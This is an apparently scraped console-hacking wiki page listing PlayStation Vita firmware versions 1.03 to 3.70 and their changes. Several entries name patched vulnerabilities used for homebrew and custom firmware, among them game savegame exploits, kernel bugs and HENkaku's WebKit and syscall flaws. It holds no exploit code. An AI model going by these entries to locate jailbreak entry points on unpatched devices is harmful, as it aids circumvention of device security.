|align=center|'''2.60'''<ref>[http://www.playstationlifestyle.net/2013/08/05/ps-vita-firmware-update-v2-60-released-download-now/ PS Vita Firmware Update v2.60 Released, Download Now]. PlayStation LifeStyle. Retrieved on 2013-08-23.</ref><ref>[http://wololo.net/2013/08/06/psvita-mandatory-ofw-2-60-now-live/ PSVITA Mandatory OFW 2.60 Now Live ·]. Wololo.net (2013-08-06). Retrieved on 2013-08-23.</ref><br />August 5, 2013<br />
|<br />
* Default release firmware for the PlayStation Vita TV in Japan.<br />
;System<br />
* [Devices] has been added under [Settings].<br />
** [Bluetooth Settings] has been moved to [Devices].<br />
* The Quick Access Menu when the PS button is held has been improved.<br />
* Stability improvements.<br />
* Anti-aliasing has been applied to home screen icons.<br />
* Closes exploit in Gamocracy One: Legend of Robot.<br />
* Closes undisclosed exploit in Pool Hall Pro.<br />
* Fixes screenshot compression bug for ''Gravity Rush'' and ''Everybody's Golf'' introduced in firmware 2.10.<br />
<br />
;LiveArea<br />
* The LiveArea for [Content Manager] and [Photos] has been updated.<br />
<br />
;PlayStation Plus<br />
* A [PlayStation Plus] icon has been added to the LiveArea to allow users to easily upload or download saved data.<br />
<br />
;Browser<br />
* Video support within the [Browser] has been extended.<br />
<br />
;Content Manager<br />
* Users can now use content on a remote system before transferring it.<br />
<br />
;Trophies<br />
* Trophies can now be hidden.<br />
|-<br />
|align=center|'''2.61'''<ref>[http://www.playstationlifestyle.net/2013/08/28/ps-vita-system-firmware-update-v2-61-coming-soon-improves-some-software-stability/ PS Vita System Firmware Update v2.61 Coming Soon, Improves Some Software]. PlayStation LifeStyle. Retrieved on 2013-08-28.</ref><br />August 28, 2013<br />
|<br />
;System<br />
* System stability has been improved.<br />
* A savegame exploit within Arcade Darts and other games has been patched, disallowing the usage of VHBL via the game.<ref>29 August 2013, [http://wololo.net/2013/08/29/ps-vita-compulsory-firmware-2-61-is-out-patches-the-arcade-exploits/ PS Vita compulsory Firmware 2.61 is out, patches the ‘Arcade’ exploits], Wololo.net</ref><br />
|-<br />
|}<br />
<br />
=== Version 3 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''3.00'''<br />November 5, 2013<br />
|<br />
;System<br />
* [Parental Controls] has been added to the home screen.<br />
* Future system software updates can now be downloaded automatically.<br />
* Portuguese (Portugal) language has been updated to reflect changes due to the Portuguese Language Orthographic Agreement of 1990.<br />
* System stability has been improved.<br />
* Several Game Exploits, Fieldrunners and others, that were actually undisclosed, got fixed. This disallows the usage of VHBL via these games.<ref>11 November 2013, [http://wololo.net/2013/11/11/sony-patched-up-to-20-exploits-with-vita-firmware-3-00/ Sony patched up to 20 exploits with Vita firmware 3.00], Wololo.net</ref><br />
<br />
;Trophies<br />
* Trophies for PS4 software can now be displayed on PS Vita.<br />
<br />
;Content Manager<br />
* Users can now transfer content to and from a PS3 with Wi-Fi on the same network, when the PS3 is version 4.50 or newer.<br />
<br />
;Messages<br />
* [Group Messaging] has been renamed to [Messages].<br />
* The icon has been changed.<br />
* Messages can now be sent to and from the PS4 and mobile devices running the PlayStation App.<br />
<br />
;Email<br />
* Contacts can now be synchronized from Gmail and Yahoo! Mail using CardDAV.<br />
<br />
;Party<br />
* The icon has been changed.<br />
* Users can now voice and text chat with friends on PS4.<br />
<br />
;Remote Play<br />
* [Remote Play] has been renamed to [PS3 Remote Play].<br />
<br />
;PS4 Link<br />
* [PS4 Link] has been added to the home screen.<br />
<br />
;Friends<br />
* The layout for the [Friends] application has changed. There are now four tabs available:<br />
** Find Player on PSN<br />
** Friends<br />
** Friend Requests<br />
** Players Blocked<br />
<br />
;Photos<br />
* Users can now take panoramic photos with the PS Vita's camera.<br />
* Panoramic photos can be viewed using the system's motion sensor.<br />
|-<br />
|align=center|'''3.01'''<ref name="PSVita301">[http://wololo.net/2013/12/10/firmware-3-01-available-some-usermode-exploits-fixed/ PS Vita System Firmware Update v3.01 - Fixes various usermode exploits]. Wololo.net. Retrieved on 2013-12-10.</ref><br />December 5, 2013<br />
|<br />
;System<br />
* System stability has been improved.<br />
* A savegame exploit within several games has been patched, disallowing the usage of VHBL/eCFW via the games.<ref>10 December 2013, [http://wololo.net/2013/12/10/firmware-3-01-available-some-usermode-exploits-fixed/ PS Vita System Firmware Update v3.01 - Fixes various usermode exploits], Wololo.net</ref><br />
|-<br />
|align=center|'''3.10'''<ref name="PSVita310">[http://blog.eu.playstation.com/2014/03/25/playstation-vita-system-software-update-3-10-coming-soon/ PS Vita System Software Update 3.10 Coming Soon]. PlayStation Blog. Retrieved on 2014-03-25.</ref><br />March 25, 2014<br />
|<br />
;System<br />
* The number of applications that can be displayed on the home screen has increased to 500.<br />
* [Adjust Daylight Savings Automatically] has been added.<br />
* [30 minutes] has been added to [Enter Standby Mode Automatically].<br />
* (''Japan only'') PocketStation functionality has been integrated into the system software.<ref name=fami310>2014-03-25, [http://www.famitsu.com/news/201403/25050481.html PS Vita、PS Vita TVのシステムソフトウェア バージョン3.10が提供開始、カレンダー機能追加など盛りだくさん!], Famitsu</ref><br />
* Added DualShock 4 compatibility to the PlayStation Vita TV.<ref name=fami310/><br />
* Added PlayStation Mobile compatibility to the PlayStation Vita TV.<ref name=fami310/><br />
* Use of an [External Keyboard] is now supported (for example, PlayStation Bluetooth Wireless Keypad).<br />
* Savegame exploits in various exploit titles got fixed.<br />
* Savegame exploits in various additional undisclosed exploit titles got fixed as well.<br />
* Internal firmware changes now prevent the execution of bigger files (e.g. TN-V/ARK eCFW) via exploits in PSP Minis, if these PSP Minis lack network functions.<br />
<br />
;Apps<br />
* Added a new [Calendar] application that synchronizes with Google Calendar.<br />
<br />
;Content Manager<br />
* Added [Manage Content on Memory Card] option.<br />
<br />
;Messages<br />
* Messages sent and received now include voice messages.<br />
<br />
;Parental Controls<br />
* Access to the PS Store can now be restricted.<br />
* Added a children's age guide.<br />
<br />
;Music<br />
* Users can now search on connected devices such as a PC.<br />
<br />
;Video<br />
* Users can now sort content by size.<br />
<br />
;Photo<br />
* [Rotate Screen Automatically] has been added.<br />
* [Freeform] has been added to the list of panoramic options.<br />
|-<br />
|align=center|'''3.12'''<ref name="PSVita312">[http://wololo.net/2014/03/28/ps-vita-firmware-3-12-available-fixes-memory-card-problems/ PS Vita mandatory firmware 3.12 available – Fixes memory card problems]. Wololo.net. Retrieved on 2014-03-28.</ref><br />March 28, 2014<br />
|<br />
;System<br />
* System software stability during use of some features has been improved.<br />
* Fixes problems with bigger memory cards,<ref>http://wololo.net/2014/03/28/ps-vita-firmware-3-12-available-fixes-memory-card-problems/</ref> which occurred in system software 3.10.<br />
|-<br />
|align=center|'''3.15'''<br />April 30, 2014<br />
|<br />
;System<br />
* ''(PS Vita TV only)'' Full functionality for PlayStation Vita TV remote play with PS4 systems added.<ref>2014-04-17, [http://www.famitsu.com/news/201404/17051793.html PS4“システムソフトウェア バージョン1.70”の内容が公開、ニコニコ生放送や各配信サービス内の動画アーカイブへの対応、HDCP信号オフなど], Famitsu</ref><ref>2014-04-17, [http://weekly.ascii.jp/elem/000/000/214/214642/ PS4がバージョン1.70へのアップデートでニコ生HD配信などに対応!], Weekly ASCII</ref><br />
* Savegame exploits in various undisclosed exploit titles have been fixed.<ref>http://wololo.net/2014/04/30/ps-vita-firmware-3-15-is-now-available/</ref><br />
<br />
; PS4 Link<br />
* Linking PS Vita with PS4 is now easier.<br />
|-<br />
|align=center|'''3.18'''<br />August 7, 2014<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*No entry sign changed.<br />
|-<br />
|align=center|'''3.20'''<br />''Pre-installed Only''<br><br />
First found on October 14, 2014<br />
|<br />
;System<br />
*This firmware was only available pre-installed on the initial release of the PlayStation TV in North America and Europe.<br />
*It allows the usage of non-Asian PSN accounts on the PS TV, if set up via PS3 or proxies, but otherwise the firmware is identical to the previous version (3.18).<br />
|-<br />
|align=center|'''3.30'''<br />October 2, 2014<br />
|<br />
;System<br />
* [Theme & Background] has been added to [Settings].<br />
* Full array of languages has been added to [External Keyboard] settings (previously was Japanese and US English only).<ref name=330jp/><br />
* [Import Saved Data] feature has now been fixed after becoming broken with release of system software 3.15.<br />
* PS4 Remote Play now supports two players simultaneously.<ref name=330jp/><br />
* Added timezone for Nouméa and daylight savings support for Wellington, New Zealand.<br />
* "Intellectual Property Notices" are now listed in the app menu on the LiveArea screen.<br />
* A savegame exploit, several kernel exploits, a WebKit exploit and some internal system flaws have been fixed.<ref>http://wololo.net/2014/10/04/ps-vita-firmware-3-30-what-is-patched-what-is-still-working/</ref><br />
<br />
;Trophies<br />
* Trophy rarity can now be viewed.<br />
<br />
;Calendar<br />
* Users can now attach and send events created in [Calendar] to [Messages] and [Email]. Recipients can save those events in their own calendars.<br />
* Users can now add Friends and other players to events created in [Calendar].<br />
* The Calendar app’s LiveArea now supports the next six tagged events.<ref name=330jp/><br />
<br />
;Browser<br />
* The system's [Browser] now supports closing all open windows.<ref name=330jp>[http://www.jp.playstation.com/psvita/update/ PlayStation®Vita/PlayStation®TV システムソフトウェア バージョン3.30 アップデートについて], Accessed 2 October 2014</ref><br />
* Improvements to the [Browser]'s ability to load pages and compatibility with HTML5/Javascript content have been made. HTML5test score increased from 291 to 345.<ref>2014-10-01, [http://www.psnstores.com/2014/10/ps-vita-system-update-3-30-now-live-adds-themes-improves-browser-allows-ps-vita-tv-to-use-na-accounts/ PS Vita System Update 3.30 Now Live: Adds Themes, Improves Browser, Allows PS Vita TV To Use NA Accounts], PSNStores</ref><br />
<br />
;Content Manager<br />
* Support for Content Manager Assistant with Windows XP and Mac OS X Leopard has been discontinued.<br />
<br />
;PS TV<br />
* The name of the VTE-1000 series has been changed to PlayStation TV or PS TV within system applications.<ref>2014年10月2日, [http://www.jp.playstation.com/info/support/sp_20141002_psvitatv.html PlayStation®Vita TVのシステムソフトウェア上の表記変更について], Sony Computer Entertainment Japan</ref><br />
* A maximum of 4 wireless controllers can be connected to the PS TV. The number of players depends on the game or application.<br />
* North American and European PSN accounts can now be used with the PlayStation TV.<br />
* Detailed warning prompt added to Standby/Shutdown screen on PlayStation TV devices.<br />
|-<br />
|align=center|'''3.35'''<br />October 28, 2014<br />
|<br />
;System<br />
*A savegame exploit in the PSP game Go! Sudoku has been fixed.<br />
*Enables compatibility with the Live from PlayStation app (requires firmware 3.30 or higher) available to download from the PS Store.<br />
;PS4 Link<br />
*Four-player Remote Play support to PlayStation TV.<br />
*Users can now adjust the video quality for Remote Play on the PS TV system according to the network environment.<br />
|-<br />
|align=center|'''3.36'''<br />January 14, 2015<br />
|<br />
;System<br />
*Fixes some internal functions of the PS Vita's PSP emulator.<br />
*A savegame exploit in an undisclosed PSP game has been fixed.<br />
*The PSP Emulator of the PS Vita has been updated to PSP firmware 6.61.<br />
|-<br />
|align=center|'''3.50'''<br />March 26, 2015<br />
|<br />
;System<br />
*Adds support for streaming in 60 frames per second while using PS4 Remote Play. If 60fps is enabled, the PS4 system will be unable to record gameplay while using Remote Play.<br />
*Accessibility has been added to the settings menu, with options such as zooming, inverted colors, closed captions, enlarged text and increased contrast options.<br />
*The Maps application has been removed.<br />
*'near' will not show Maps and other related content anymore.<br />
*PSN has been renamed to PlayStation Network<br />
*The [Chat] setting under [PlayStation Network] > [Sub Account Management] has been renamed as [Chat/User-Generated Media].<br />
*Sub account users can now be restricted from sending and receiving [Messages from other players] in [Messages].<br />
*The online-status of friends is no longer shown with a pop-up box.<br />
*Fixed savedata exploits in various PSP games (Arcade Darts, Patapon 2, Numblast, etc.).<br />
*Fixed kernel mode exploit that enabled the usage of eCFWs within the PSP emulator of the PS Vita.<br />
*Fixed the "custom bubble" exploit.<br />
*30% of the reserved 256MB memory for the operating system now free for games.<br />
|-<br />
|-<br />
|align=center|'''3.51'''<br />May 13, 2015<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Additional fixes for the "custom bubble" exploit.<br />
*Fixes lag some users reported on the home screen of the system.<br />
|-<br />
|align=center|'''3.52'''<br />June 23, 2015<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Revoked PlayStation Mobile.<ref name="Rejuvenate">http://wololo.net/2015/06/24/ps-vita-firmware-3-52-is-out-revokes-psm-support-effectively-patching-the-rejuvenate-hack-do-not-update/</ref><br />
*Fixed the "Rejuvenate" exploit.<ref name="Rejuvenate" /><br />
|-<br />
|align=center|'''3.55'''<ref>https://web.archive.org/web/20150930182904/https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />September 30, 2015<br />
|<br />
;System<br />
*Fixed the Mail Writer exploit.<ref name="Fail-Mail">http://wololo.net/2015/09/30/playstation-vita-firmware-3-55-is-now-available-does-it-patch-the-fail-mail-flaw/</ref><br />
*Fixes several PSP usermode exploit.<ref name="Fail-Mail" /><br />
;PS4 Link<br />
*You can now adjust the setting for video resolution when using remote play on a PS Vita system. Select (PS4 Link) > [Start] > (Options) > [Settings] > [Video Quality for Remote Play] > [Resolution]. <br />
** If video or audio skips during playback, try selecting [Low (360p)] to help improve the quality.<br />
;Parental Controls<br />
*You can now restrict [Email] from starting.<br />
|-<br />
|align=center|'''3.57'''<ref>http://gematsu.com/2016/01/ps3-ps-vita-ending-facebook-link-support</ref><br />January 20, 2016<br />
|<br />
;System<br />
*Removed the system-wide Facebook integration.<br />
*Fixed kernel mode exploit that enabled the usage of eCFWs within the PSP emulator of the PS Vita.<br />
*Fixed the "custom bubble" exploit.<ref>http://wololo.net/2016/01/20/playstation-vita-system-software-3-57-is-now-available-fixes-currently-testing/</ref><br />
|-<br />
|align=center|'''3.60'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />April 6, 2016<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
|-<br />
|align=center|'''3.61'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />August 8, 2016<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
*Fixed <code>sceIoDevctl</code> uninitialized stack memory leak used by HENkaku.<br />
*Fixed WebKit <code>JSArray::sortCompactedVector</code> vulnerability used by HENkaku.<br />
|-<br />
|align=center|'''3.63'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />November 1, 2016<br />
|<br />
;System<br />
*This system software update improves the quality of the system performance.<br />
*Fixed <code>sceNetIoctl</code> use-after-free used by HENkaku.<br />
|-<br />
|align=center|'''3.65'''<br />April 18, 2017<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Fixed PSP emulator kernel exploit used by ARK.<br />
|-<br />
|align=center|'''3.67'''<br />November 28, 2017<br />
|<br />
;System<br />
*This system software update improves the quality of the system performance.<br />
<hr><br />
*Twitter dialog updated.<br />
*Calendar icon updated.<br />
*Added TLS 1.2 support in the web browser.<br />
*Fixed Ensō exploit.<br />
|-<br />
|align=center|'''3.68'''<br />April 10, 2018<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
<hr><br />
*Minor WebKit update (vector index masking).<ref name="WebKit-368">https://gist.github.com/StepS-/436098ac8979217d263bab2edab11ee5</ref><br />
*Fixed some devkit-specific kernel bugs.<ref name="DevKit-367">[https://twitter.com/theflow0/status/985137344570372096 Sony has fixed 3 kernel bugs in 3.68, which combined, could lead to kernel code execution on a devkit]. TheFloW (@theflow0) on Twitter</ref><ref name="DevKit-367-sceMotionDevGetEvaInfo">[https://twitter.com/theflow0/status/984919058863845378 sceMotionDevGetEvaInfo could leak 0x48 bytes of kernel stack]. TheFloW (@theflow0) on Twitter</ref><br />
|-<br />
|align=center|'''3.69'''<br />September 10, 2018<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
<hr><br />
*Fixed some bugs in SceNgs<br />
*SSL library updated (along with other networking libraries that uses SceSsl), two new root certificates added<br />
|-<br />
|align=center|'''3.70'''<br />January 14, 2019<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
<hr><br />
*Changed the enc key<br />
*Forgot to change any other keys. Oops!<br />
|-<br />
|}<br />
<br />
[[Category:Firmware]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=System_Software&diff=9926System Software2019-01-15T03:17:04Z<p>Xyz: </p>
<hr />
<div>== History of updates ==<br />
Originally taken from [https://en.wikipedia.org/w/index.php?title=PlayStation_Vita_system_software&oldid=746007330 Wikipedia].<br />
<br />
=== Version 1 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''1.03'''<br />December 17, 2011<br />
|<br />
* Japanese release firmware<br />
|-<br />
|align=center|'''1.04'''<br />December 17, 2011<br />
|<br />
* Provided only with Shin Kamaitachi no Yoru: 11 Hitome no Suspect<br />
|-<br />
|align=center|'''1.05'''<br />December 17, 2011<br />
|<br />
* Japanese release firmware<br />
|-<br />
|align=center|'''1.06'''<br />February 15, 2012<br />
|<br />
* EU release firmware<br />
* US First Edition Bundle release firmware<br />
|-<br />
|align=center|'''1.50'''<br />December 17, 2011<br />
|<br />
;System<br />
* Support for the PlayStation Vita cradle.<br />
|-<br />
|align=center|'''1.51'''<br />December 27, 2011<br />
|<br />
;System<br />
* Addresses freezing issues with certain games.<br />
|-<br />
|align=center|'''1.52'''<br />January 16, 2012<br />
|<br />
;System<br />
*Improved system stability.<br />
*The 1.51 bug where the 3G/Wi-Fi SKU would not recognize a SIM card has been fixed.<ref>http://www.theverge.com/gaming/2012/1/16/2712066/playstation-vita-updated-to-version-1-52-in-japan-fixes-3g-sim</ref><br />
|-<br />
|align=center|'''1.60'''<ref>http://play-beyond.net/2012/02/08/ps-vita-system-update-1-60-full-change-log/</ref><br />February 8, 2012<br />
|<br />
;Apps<br />
*An application powered by Google Maps has been added.<br />
<br />
;Near<br />
*In [near], information about players is now displayed on the [Discoveries] screen.<br />
<br />
;Content Manager<br />
*Users can now delete backup files in [Content Manager].<br />
<br />
;Photos<br />
*Users can now record video under the [Photos] application.<br />
<br />
;System<br />
*The PS button will now flash blue while the battery is charging.<br />
*In [Settings], the position where [Flight Mode] appears has been changed.<br />
*You can now publish stories about the products that you rate in PlayStation Store to Facebook.<br />
*You can now report inappropriate messages in [Group Messaging] and inappropriate comments about an activity.<br />
*“PlayStation Network account” has been renamed to “Sony Entertainment Network account”.<br />
|-<br />
|align=center|'''1.61'''<ref>http://blog.us.playstation.com/2012/02/20/ps-vita-system-software-update-v1-61</ref><br />February 21, 2012<br />
|<br />
;System<br />
*Improves certain aspects of the system software.<br />
*Fixed [[Vulnerabilities#Syscall_handler_doesn.27t_check_syscall_number|SVC table overflow vulnerability]]. (Pretty sure this is the version they fixed it in [[User:Xyz|Xyz]] ([[User talk:Xyz|talk]]) 04:24, 19 April 2017 (UTC))<br />
|-<br />
|align=center|'''1.65'''<ref>http://blog.us.playstation.com/2012/04/02/ps-vita-system-software-update-v1-65</ref><br />April 3, 2012<br /><small>''Replaced with 1.66''</small><br />
|<br />
;System<br />
* [Notification Alert] has been added to [Settings], allowing users to toggle alerts on and off.<br />
* [After 10 Minutes] has been added to time options under [Power Save Settings].<br />
* Caps Lock is now supported in the On Screen Keyboard.<br />
* An arrow icon will now display when PS Vita finds new activities in the LiveArea.<br />
* Addition of installation progress bar for downloaded games and DLC.<br />
* minis with a pre-set expiry date (such as those obtained via PlayStation Plus) now load correctly.<br />
* Fixes security issues with two PSP games that allowed users to run unauthorized content on the device through an exploit.<ref>http://wololo.net/wagic/2012/04/04/ps-vita-firmware-update-1-66-available/</ref> <br />
|-<br />
|align=center|'''1.66'''<ref>http://www.engadget.com/2012/04/04/playstation-vita-1-66-firmware-update/</ref><br />April 4, 2012<br />
|<br />
;System<br />
* Fixed problems which appeared in 1.65<br />
* [Settings]<br />
* The [System Music] setting in [Settings] > [Sound and Display] now affects background music in [PS Store], [near], the Sign-Up screens, and the Home menu.<br />
* The display time of notification alerts has been reduced from 5 seconds to 3 seconds.<br />
* Functional improvements have been made in the following games and applications: Unit 13, Gravity Daze, near.<br />
<br />
;Near<br />
* When searching for location data, users now have the option to [Retry] and [Cancel] when a failure occurs.<br />
* A direct link to [PS Store] is made available for new applications that users may discover on [near].<br />
* Users can now update data at any time within [near], provided they are within the same location.<br />
|-<br />
|align=center|'''1.67'''<ref>http://exophase.com/36431/ps-vita-firmware-1-67-goes-live/</ref><br />April 11, 2012<br />
|<br />
;System<br />
* Resolves an issue with the camera functionality when playing ''Dream Club Zero Portable''.<ref>http://www.jp.playstation.com/psvita/update/</ref> <br />
|-<br />
|align=center|'''1.69'''<ref>http://blog.us.playstation.com/2012/06/11/ps-vita-at-e3-minor-system-software-update-coming/</ref><br />June 11, 2012<br /><small>''Optional''</small><br />
|<br />
;System<br />
* Improved system stability<br />
* A savegame exploit within Super Collapse 3 has been patched, disallowing the usage of VHBL via the game.<ref>12 June 2012, [http://wololo.net/2012/06/12/ps-vita-firmware-1-69-patches-the-super-collapse-3-exploit/ PS Vita Firmware 1.69 patches the Super Collapse 3 exploit], Wololo.net</ref><br />
* Resolves a compatibility issue with the PlayStation Portable game ''Conception: Ore no Kodomo wo Undekure!''.<ref>http://andriasang.com/con1f1/conception_firmware/</ref> <br />
|-<br />
|align=center|'''1.691'''<br />July 4, 2012<br /><small>''Optional''</small><br />
|<br />
;System<br />
* Resolves a compatibility issue with the PS Vita demo for ''Escape Plan''.<br />
|-<br />
|align=center|'''1.80'''<ref>[http://blog.us.playstation.com/2012/08/14/psone-classics-coming-to-ps-vita-via-the-latest-system-software-update-v1-80/ PSone Classics Coming to PS Vita via the latest System Software Update (v1.80) – PlayStation.Blog]. Blog.us.playstation.com (2012-08-14). Retrieved on 2013-08-23.</ref><br />August 28, 2012<br />
|<br />
;System<br />
* Users can now control the home screen, as well as some applications like [Music] and [Video], with the PS Vita system's buttons.<br />
* Notification settings under [Sound & Display Settings] have been moved to their own [Notification Settings] menu.<br />
* The items under [Date & Time] > [Date & Time Settings] have been changed.<br />
* A Japanese keyboard has been added.<br />
* Memory cards are now locked to PSN accounts, to prevent users from switching between accounts. The system will refuse to accept a memory card locked to another account unless the memory card is reformatted.<ref>http://i.imgur.com/4nsEl.jpg</ref><br />
* The layout of category lists have been improved in [Photos], [Music], and [Videos].<br />
* The [Notification Center] has been redesigned.<br />
* Importing content from a PC or PlayStation 3 has been improved.<br />
* The [Help] feature of the LiveArea has been improved.<br />
* Icons for some menu items have been changed.<br />
* Users can now report some errors to Sony Computer Entertainment.<br />
* Background colors have been changed.<br />
* Fixed a [[Vulnerabilities#Stack_buffer_overflow_in_sceSblDmac5EncDec|stack buffer overflow in sceSblDmac5EncDec]] and a ton of other vulns.<br />
<br />
;Remote Play<br />
* Added [Cross-Controller] feature to allow the PS Vita system to interact as a secondary controller with a PlayStation 3 system.<br />
<br />
;Games<br />
* Users can now play select PSone Classics from the PlayStation Store.<br />
* Users can now map more combinations of PSP system buttons to the PS Vita right analog stick when playing PSP games or minis. In addition, users can also map a PSP system button to each of the four corners of the PS Vita system touch screen.<br />
* [Import Saved Data] has been added to the LiveArea screen. This will only be shown for games that support this feature.<br />
<br />
;Photos<br />
* The MPO format can now be viewed on the PS Vita system. Additionally, it is now possible to transfer MPO files using a PlayStation 3 or PC using Content Manager. 3D and multi-angle viewing are not supported.<br />
<br />
;Music<br />
* Playlists in iTunes (10.6.3 or later), M3U, and M3U8 formats are now supported in [Music].<br />
* Playlists can also be transferred from a PS3 system.<br />
<br />
;Videos<br />
* Playback speed control and repeat play have been added to [Video].<br />
* When moving the progress bar during video playback, it now shows the image of the specified location in the video.<br />
* A thumbnail for videos will now be generated automatically when there is no thumbnail information available.<br />
* Users can now copy photos or videos to a PC or PS3 while a photo or video is displayed.<br />
<br />
;Friends<br />
* Users can now delete multiple friend requests simultaneously.<br />
<br />
;Near<br />
* [near] can now gather information of surrounding Wi-Fi access points without an Internet connection and will update location data based on this information at a later time.<br />
* The LiveArea screen for [near] has been improved and now shows lifetime statistics.<br />
<br />
;Group Messaging<br />
* There have been layout improvements made to [Group Messaging].<br />
* Users can now take photos using the camera to add as attachments in [Group Messaging].<br />
* The [New Message] button on the [Group Messaging] LiveArea screen has been removed.<br />
<br />
;Maps<br />
[Maps] has been improved by adding a button to the top of the screen to switch between [Search for Location] and [Search for Directions]. Users can also touch and hold a location on the map to place a flag.<br />
<br />
;Browser<br />
* The use of the rear touchpad for scrolling and zooming is now supported in the [Browser].<br />
* Users are no longer able to use a JavaScript bookmark trick to download YouTube videos in the [Browser].<br />
* A button has been added to the [Browser] to immediately go to the top of the page.<br />
<br />
;Party<br />
* Users can now view a history of up to 100 chat messages and information in [Party].<br />
|-<br />
|align=center|'''1.81'''<ref>[https://twitter.com/PlayStation/status/247851681428164609 Twitter / PlayStation: PS Vita system software update]. Twitter.com. Retrieved on 2013-08-23.</ref><br />September 17, 2012<br />
|<br />
;System<br />
* Software stability has been improved.<br />
* A savegame exploit within Monster Hunter Freedom Unite has been patched, disallowing the usage of VHBL via the game.<ref>18 September 2012, [http://wololo.net/2012/09/18/vita-firmware-1-81-is-out-patches-vhbl/ Vita Firmware 1.81 is out, patches VHBL], Wololo.net</ref><br />
<br />
;Treasure Park<br />
* An issue was resolved where the game would fail to load properly if the user had received too many treasure sheets.<br />
|-<br />
|}<br />
<br />
=== Version 2 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''2.00'''<ref>[http://blog.us.playstation.com/2012/11/13/playstation-plus-for-ps-vita-available-next-week-take-the-tour/ PlayStation Plus for PS Vita Available Next Week – Take the Tour – PlayStation.Blog]. Blog.us.playstation.com (2012-11-13). Retrieved on 2013-08-23.</ref><br />November 19, 2012<br />
|<br />
;System<br />
* System buttons can now be used in more applications.<br />
* Turkish has been added as a system language.<br />
* In [Settings], users can now set how they will be alerted depending on the type of notification.<br />
* [Disconnect Wi-Fi Connection Automatically] has been added to [Network] > [Wi-Fi Settings].<br />
* [PlayStation Network]<br />
* Support for PlayStation Plus has been added.<br />
* Users can now connect their PlayStation Network account to Twitter.<br />
* [Avatar], [Panel], [Online ID], [About Me] and [My Languages] under [PlayStation Network] > [Account Information] have been moved to the new category [Profile].<br />
* [PlayStation Mobile] has been added under [System].<br />
* Screenshots are now saved in the background.<br />
* Trophy synchronization is now performed in the background.<br />
* A savegame exploit within Urbanix has been patched.<br />
* Users can now delete screenshots or songs from PlayStation Portable games.<br />
<br />
;Content Manager<br />
* [Content Manager] has been redesigned.<br />
* Users can now transfer content to and from PlayStation Plus online storage, to and from a PS3, and to and from a PC via Wi-Fi.<br />
<br />
;Browser<br />
* The rendering engine has been improved.<br />
* The [Browser] now uses additional GPU processing power.<br />
* Tapping on a YouTube link will now open the respective video in the YouTube app.<br />
* The HTML5 and JavaScript engines have been upgraded.<br />
* Users can now send their current [Browser] URL using their Twitter settings.<br />
* Users can now access the [Browser] while in an application or game.<ref>Shuhei Yoshida on Twitter. https://twitter.com/yosp/status/270429820712783872</ref><br />
* A pointer can now be used (in conjunction with pressing L or R and tapping on the screen) to select links.<br />
<br />
;Apps<br />
* [Email] has been added as an application.<br />
<br />
;Maps<br />
* [Maps] can now display weather information for locations where it is available.<br />
<br />
;Near<br />
* The layout of [Near] has been revised.<br />
<br />
;Friends<br />
* The activities list for Friends has been moved to the LiveArea screen.<br />
* Users can now attach a comment when sending a friend request.<br />
* Users can now file a [Grief Report] for inappropriate comments when sent with a friend request.<br />
* TIFF, BMP, PNG, GIF, and MPO are now supported as file formats in [Group Messaging].<br />
<br />
;Videos<br />
* The PS Vita system can now display videos with 1080 resolution.<br />
* Videos can now display captioning.<br />
* Videos can now be played in slow motion.<br />
* Users can now skip chapters in videos.<br />
* Folders can now be transferred from a PS3 or PC to the PS Vita for [Photos] and [Videos].<br />
* When browsing lists in Music and Videos, titles will now scroll horizontally if they are too long.<br />
<br />
;PSone Classics<br />
* [Assign Touchscreen] and [Assign Rear Touch Pad] have been added to [Controller Settings].<br />
* [Custom] has been added to [Other Settings] > [Screen Mode].<br />
|-<br />
|align=center|'''2.01'''<ref>[http://www.playstationlifestyle.net/2012/12/03/ps-vita-firmware-v2-01-is-live-download-now/ PS Vita Firmware v2.01 is Live, Download Now]. Playstationlifestyle.net. Retrieved on 2013-08-23.</ref><br />December 3, 2012<br />
|<br />
;PlayStation Plus<br />
* Issue with the [Upload Automatically] setting for saved data has now been corrected.<br />
<br />
;System<br />
* Improved system stability<br />
|-<br />
|align=center|'''2.02'''<ref>[http://www.playstationlifestyle.net/2012/12/18/playstation-vita-system-software-version-2-02-now-available-for-download/ PlayStation Vita System Software Version 2.02 Now Available For Download]. Playstationlifestyle.net. Retrieved on 2013-08-23.</ref><br />December 19, 2012<br />
|<br />
;System<br />
* Improved system stability<br />
|-<br />
|align=center|'''2.05'''<ref>[http://www.playstationlifestyle.net/2013/01/22/ps-vita-system-software-version-2-05-likely-coming-today-seems-to-be-mandatory/ PS Vita System Software Version 2.05 Likely Coming Today, Seems to be Mandatory]. PlayStation LifeStyle. Retrieved on 2013-08-23.</ref><br />January 24, 2013<br />
|<br />
;System<br />
* Improved system stability<br />
* Closes exploit in UNO game. <br />
|-<br />
|align=center|'''2.06'''<ref>[https://twitter.com/PlayStation/status/311264776577765376 Twitter / PlayStation: Heads up - PS Vita v2.06 software]. Twitter.com. Retrieved on 2013-08-23.</ref><br />March 12, 2013<br />
|<br />
;System<br />
* Improved system stability<br />
* Closes exploit in Dissidia Duodecim PSP game.<br />
